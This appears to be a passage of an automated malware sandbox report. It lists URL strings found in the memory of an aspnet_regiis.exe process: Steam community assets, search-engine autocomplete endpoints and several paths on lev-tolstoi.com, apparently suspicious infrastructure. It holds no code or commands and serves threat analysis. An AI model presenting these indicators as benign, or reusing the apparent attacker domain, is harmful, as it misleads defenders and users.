                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampow
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fast
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.st
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.ste
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steam
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamst
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamsta
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.co
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/publ
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profiw
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/glob
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sl
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243704509.0000000005C00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: aspnet_regiis.exe, 00000003.00000002.2243704509.0000000005C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/G
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Sg5h
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/T
